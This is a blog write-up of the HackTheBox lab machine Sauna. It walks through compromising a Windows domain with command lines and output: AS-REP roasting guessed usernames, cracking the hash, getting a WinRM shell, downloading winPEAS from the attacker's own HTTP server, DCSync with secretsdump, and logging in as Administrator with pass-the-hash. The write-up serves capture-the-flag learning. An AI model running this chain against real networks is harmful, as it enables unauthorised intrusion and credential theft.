Home About Writeups

Sauna (10.10.10.175) - HackTheBox

OS: Windows
Difficulty: Easy (4.9)
Author: egotisticalSW

Foothold & User

At first the usual nmap scan:


sw1tchbl4d3@bl4d3r:~/htb/Windows/Solved/Sauna-175 % nmap -p- -sV 10.10.10.175
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 13:12 CET
Nmap scan report for 10.10.10.175
Host is up (0.045s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-16 20:14:13Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49522/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/16%Time=5E4931AE%P=x86_64-unknown-linux-gnu%r
SF:(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07ver
SF:sion\x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m47s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-02-16T20:16:31
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 310.91 seconds

We can see that it's a windows machine (as expected), and it has a webserver on port 80 open.

Opening it in the browser presents us with the Website of the "Egotistical Bank".

After searching a bit through the website you'll notice the "About Us" page.

Scrolling down gets us a list of full names.

I've modified them like a sysadmin probably would for usernames and ended up with this list of possible usernames:


hugo.smith
fergus.smith
shaun.coins
hugo.bear
bowie.taylor
sophie.driver
steven.kerb
fsmith
scoins
hbear
btaylor
sdriver
skerb

The website didnt present any more data for us.

I've tried to enumerate other services like smb, rpc etc.. but none yielded any real results.

Then I turned to the impacket tools.

Since we have a list of usernames, I tried the GetNPUsers.py (with the domain EGOTISTICAL-BANK.LOCAL from the nmap scan).


sw1tchbl4d3@bl4d3r:~/htb/Windows/Solved/Sauna-175 % GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -usersfile usernames.txt

Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:7368a688cde75d411*8ee34
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

and we actually got a hash for the user fsmith.

Cracking the Hash with John gets us:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:T********s23

And with evil-winrm we get a shell with that password.


sw1tchbl4d3@bl4d3r:~/htb/Windows/Solved/Sauna-175 % evil-winrm -i 10.10.10.175 -u fsmith -p 'T********s23'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents>

You'll find the user flag on the Desktop of fsmith then.

Root

After getting the user flag I've done some basic enum, to do that I've downloaded the winPEAS executable to the machine.

Because the HackTheBox Machines don't have Internet Access, I've downloaded the script to my PC and opened a Python SimpleHTTPServer.

The Machine can then download the file from my SimpleHTTPServer like this:

Invoke-WebRequest "http://10.10.14.166:8000/winPEAS.exe" -OutFile winPEAS.exe

and after that start it:


*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winPEAS.exe
[...]
[+] Looking for AutoLogon credentials(T1012)
	Some AutoLogon credentials were found!!
	DefaultDomainName             :  EGOTISTICALBANK
	DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
	DefaultPassword               :  M***********************d!
[...]

And we get the credentials for the svc_loanmanager

Not really knowing what to do with that user I turned back to impacket to try to get more information about the system.

And the secretsdump.py worked now, with the privilieges svc_loanmanager gave us:


sw1tchbl4d3@bl4d3r:~/htb/Windows/Solved/Sauna-175 % secretsdump.py svc_loanmgr@10.10.10.175 -dc-ip 10.10.10.175                                                                            
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad***ee:d9485***9dff:::
[...]
[*] Cleaning up...

Now we can just pass-the-hash and login as the Administrator user!


sw1tchbl4d3@bl4d3r:~/htb/Windows/Solved/Sauna-175 % evil-winrm -i 10.10.10.175 -u Administrator -H d9485***9dff

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

And now we can just read the root flag!

~sw1tchbl4d3, 13/07/2020 (dd/mm/yyyy)